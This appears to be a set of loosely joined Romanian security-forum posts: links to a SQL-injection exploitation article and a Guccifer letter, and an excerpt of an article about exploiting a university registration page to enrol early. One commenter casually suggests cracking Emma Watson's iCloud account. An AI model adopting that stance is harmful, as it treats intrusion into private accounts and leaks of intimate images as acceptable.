[Source1] [Source2] Geplaatst door Mathy op 10:45 Sursa: http://www.mathyvanhoef.com/2011/10/exploiting-insert-into-sql-injections.html

Nu am citit, dar pare legat de subiect: https://cryptome.org/2015/06/guccifer-letter-01.htm

Putea sa faca ceva mai util, sa "sparga" contul de iCloud al Emmei Watson El e cel care a pornit "The fappening" cu Jennifer Lawrence si restul?

Competență sau fraudă? Cristian Șerban Application Security @Betfair PROGRAMARE În urmă cu zece ani la universitatea unde eram student s-a organizat o miniconferință de securitate. Pentru a fi mai interesant, organizatorii au creat și o pagină de înregistrare care urma să fie deschisă pentru a accepta înscrieri începând cu ora 12 la o anumită dată. Mă pasiona domeniul și mi-am dorit să particip. Mi-am dorit să mă înscriu printre primii pentru a-mi asigura locul și mai ales că au promis că dau câte un tricou la primii 20 de participanți care se înscriu. La vremea respectivă eu lucram ca programator angajat full time și deja adunasem ceva ore de lucru în tehnologia folosită pentru dezvoltarea paginii de înscrieri. Așa că nu mi-a luat mult timp să descopăr o vulnerabilitate și să reușesc să o exploatez în timp util. Am reușit să mă înscriu puțin mai înainte de ora oficială. În următoarea zi m-am prezentat la conferință la intrare, am salutat politicos, mi-am spus numele, colegul m-a cautat pe listă și m-a găsit destul de ușor. Am tras puțin cu ochiul: eram primul 11:58. Perfect. Uimit puțin, acesta a zis: "Ah tu ești ăla, cum ai reușit?". La întrebarea mea dacă primesc un tricou, el a răspuns că nu, dar că o să primesc ceva mai bun. În timpul conferinței m-a anunțat public și mi-a înmânat drept premiu cartea "Writing Secure Code" a lui Michael Howard și David LeBlanc. Articol complet: http://www.todaysoftmag.ro/article/1250/competenta-sau-frauda Cred ca e util ca indrumare.

Ban.